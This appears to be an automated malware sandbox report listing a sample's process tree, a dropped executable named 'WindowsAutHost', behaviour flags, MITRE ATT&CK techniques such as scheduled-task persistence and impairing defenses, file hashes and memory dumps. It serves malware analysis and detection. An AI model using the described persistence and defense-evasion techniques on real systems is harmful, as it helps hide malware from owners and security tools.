7/0lJ0HpyV9elvtzcqGK1WbSDms8HbCSZ/+vrJ6u5etp4ylwwIQEnNXf/eDu9xpF/TOOUuGscmifZX6uAR3tFfBdpKNmeLxmD2eBnppygp0iLxewc6D0lvous5Dorw2yJY764xpmTE/TaweK1Ud25A==
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1964

C:\Windows\system32\taskeng.exe
taskeng.exe {45F9ABB8-5C68-4595-9451-08E0CCAB90A2} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1784

C:\Program Files\WindowsServices\WindowsAutHost
"C:\Program Files\WindowsServices\WindowsAutHost"
2⤵
- Executes dropped EXE
PID:108

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\WindowsServices\WindowsAutHost

Filesize
9.4MB

MD5
61c98e80e70b0f3e3951dccff351644c

SHA1
541c48539d943c6bd261127829f1e29904a5b945

SHA256
14541883dc05d0e8e954b1de4d5c717ab7a215fa2472332971c6695038324371

SHA512
fba3db8b8c9be2a5e2646bcb313e947d5634989ffee31501f40f1d0c14f6633e39161d2c35393c3a33fedf65674cab2fcd55f817e03a803216db6d94ad5183ca

Download Submit
C:\Program Files\WindowsServices\WindowsAutHost

Filesize
9.4MB

MD5
61c98e80e70b0f3e3951dccff351644c

SHA1
541c48539d943c6bd261127829f1e29904a5b945

SHA256
14541883dc05d0e8e954b1de4d5c717ab7a215fa2472332971c6695038324371

SHA512
fba3db8b8c9be2a5e2646bcb313e947d5634989ffee31501f40f1d0c14f6633e39161d2c35393c3a33fedf65674cab2fcd55f817e03a803216db6d94ad5183ca

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
f17376346e3f1e772cbb6bec7b8b142c

SHA1
8769cc36fd9700d9a0e8ae734bcebb760484ec67

SHA256
7df113149c579698fcad7af779ab7400a0bf2a1435fe7392a3627f232cb7bffd

SHA512
c1a65f79840df1b05e004759e57252685b3023099a3e5314758468972d74ab26669a785b4bd4fdfb8624974b956227b2741074a1ad78121e8b0a2759b02d520c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
f17376346e3f1e772cbb6bec7b8b142c

SHA1
8769cc36fd9700d9a0e8ae734bcebb760484ec67

SHA256
7df113149c579698fcad7af779ab7400a0bf2a1435fe7392a3627f232cb7bffd

SHA512
c1a65f79840df1b05e004759e57252685b3023099a3e5314758468972d74ab26669a785b4bd4fdfb8624974b956227b2741074a1ad78121e8b0a2759b02d520c

Download Submit
\??\PIPE\srvsvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\Program Files\WindowsServices\WindowsAutHost

Filesize
9.4MB

MD5
61c98e80e70b0f3e3951dccff351644c

SHA1
541c48539d943c6bd261127829f1e29904a5b945

SHA256
14541883dc05d0e8e954b1de4d5c717ab7a215fa2472332971c6695038324371

SHA512
fba3db8b8c9be2a5e2646bcb313e947d5634989ffee31501f40f1d0c14f6633e39161d2c35393c3a33fedf65674cab2fcd55f817e03a803216db6d94ad5183ca

Download Submit
memory/108-96-0x0000000000000000-mapping.dmp

Download
memory/432-106-0x0000000000000000-mapping.dmp

Download
memory/432-68-0x0000000000000000-mapping.dmp

Download
memory/524-118-0x0000000000000000-mapping.dmp

Download
memory/568-119-0x0000000000F64000-0x0000000000F67000-memory.dmp

Filesize
12KB

Download
memory/568-110-0x000007FEF3330000-0x000007FEF3D53000-memory.dmp

Filesize
10.1MB

Download
memory/568-120-0x0000000000F6B000-0x0000000000F8A000-memory.dmp

Filesize
124KB

Download
memory/568-112-0x000007FEF27D0000-0x000007FEF332D000-memory.dmp

Filesize
11.4MB

Download
memory/568-125-0x0000000000F6B000-0x0000000000F8A000-memory.dmp

Filesize
124KB

Download
memory/584-117-0x0000000000000000-mapping.dmp

Download
memory/592-94-0x00000000026DB000-0x00000000026FA000-memory.dmp

Filesize
124KB

Download
memory/592-93-0x00000000026D4000-0x00000000026D7000-memory.dmp

Filesize
12KB

Download
memory/592-91-0x00000000026D4000-0x00000000026D7000-memory.dmp

Filesize
12KB

Download
memory/592-90-0x000007FEF27D0000-0x000007FEF332D000-memory.dmp

Filesize
11.4MB

Download
memory/592-89-0x000007FEF3330000-0x000007FEF3D53000-memory.dmp

Filesize
10.1MB

Download
memory/628-92-0x0000000000000000-mapping.dmp

Download
memory/672-113-0x0000000000000000-mapping.dmp

Download
memory/688-114-0x0000000000000000-mapping.dmp

Download
memory/844-71-0x0000000000000000-mapping.dmp

Download
memory/988-74-0x0000000000000000-mapping.dmp

Download
memory/1004-111-0x0000000000000000-mapping.dmp

Download
memory/1032-122-0x0000000000000000-mapping.dmp

Download
memory/1084-105-0x0000000000000000-mapping.dmp

Download
memory/1120-57-0x000007FEFB871000-0x000007FEFB873000-memory.dmp

Filesize
8KB

Download
memory/1120-58-0x000007FEF3330000-0x000007FEF3D53000-memory.dmp

Filesize
10.1MB

Download
memory/1120-60-0x00000000025F4000-0x00000000025F7000-memory.dmp

Filesize
12KB

Download
memory/1120-59-0x000007FEF27D0000-0x000007FEF332D000-memory.dmp

Filesize
11.4MB

Download
memory/1120-61-0x00000000025F4000-0x00000000025F7000-memory.dmp

Filesize
12KB

Download
memory/1120-62-0x00000000025FB000-0x000000000261A000-memory.dmp

Filesize
124KB

Download
memory/1124-104-0x0000000000000000-mapping.dmp

Download
memory/1124-64-0x0000000000000000-mapping.dmp

Download
memory/1168-115-0x0000000000000000-mapping.dmp

Download
memory/1280-116-0x0000000000000000-mapping.dmp

Download
memory/1412-121-0x0000000000000000-mapping.dmp

Download
memory/1456-70-0x0000000000000000-mapping.dmp

Download
memory/1460-86-0x0000000000000000-mapping.dmp

Download
memory/1464-127-0x0000000000000000-mapping.dmp

Download
memory/1468-84-0x0000000000000000-mapping.dmp

Download
memory/1512-76-0x0000000000000000-mapping.dmp

Download
memory/1532-73-0x0000000000000000-mapping.dmp

Download
memory/1544-82-0x0000000000000000-mapping.dmp

Download
memory/1544-123-0x0000000000000000-mapping.dmp

Download
memory/1560-124-0x0000000000000000-mapping.dmp

Download
memory/1608-99-0x000007FEF2990000-0x000007FEF33B3000-memory.dmp

Filesize
10.1MB

Download
memory/1608-102-0x0000000000E74000-0x0000000000E77000-memory.dmp

Filesize
12KB

Download
memory/1608-103-0x0000000000E7B000-0x0000000000E9A000-memory.dmp

Filesize
124KB

Download
memory/1608-101-0x0000000000E74000-0x0000000000E77000-memory.dmp

Filesize
12KB

Download
memory/1608-100-0x000007FEF1E30000-0x000007FEF298D000-memory.dmp

Filesize
11.4MB

Download
memory/1688-109-0x0000000000000000-mapping.dmp

Download
memory/1712-72-0x0000000000000000-mapping.dmp

Download
memory/1756-77-0x0000000000000000-mapping.dmp

Download
memory/1776-81-0x0000000000000000-mapping.dmp

Download
memory/1804-54-0x000000013FF90000-0x0000000141011000-memory.dmp

Filesize
16.5MB

Download
memory/1804-88-0x000000013FF90000-0x0000000141011000-memory.dmp

Filesize
16.5MB

Download
memory/1804-56-0x000000013FF90000-0x0000000141011000-memory.dmp

Filesize
16.5MB

Download
memory/1812-66-0x0000000000000000-mapping.dmp

Download
memory/1952-75-0x0000000000000000-mapping.dmp

Download
memory/1964-128-0x00000000000B0000-0x00000000000D0000-memory.dmp

Filesize
128KB

Download
memory/1964-83-0x0000000000000000-mapping.dmp

Download
memory/1964-132-0x0000000000BA0000-0x0000000000BC0000-memory.dmp

Filesize
128KB

Download
memory/1964-131-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/1964-130-0x0000000000BA0000-0x0000000000BC0000-memory.dmp

Filesize
128KB

Download
memory/1964-129-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/1972-78-0x0000000002484000-0x0000000002487000-memory.dmp

Filesize
12KB

Download
memory/1972-69-0x000007FEF1E30000-0x000007FEF298D000-memory.dmp

Filesize
11.4MB

Download
memory/1972-80-0x000000000248B000-0x00000000024AA000-memory.dmp

Filesize
124KB

Download
memory/1972-67-0x000007FEF2990000-0x000007FEF33B3000-memory.dmp

Filesize
10.1MB

Download
memory/1972-79-0x000000000248B000-0x00000000024AA000-memory.dmp

Filesize
124KB

Download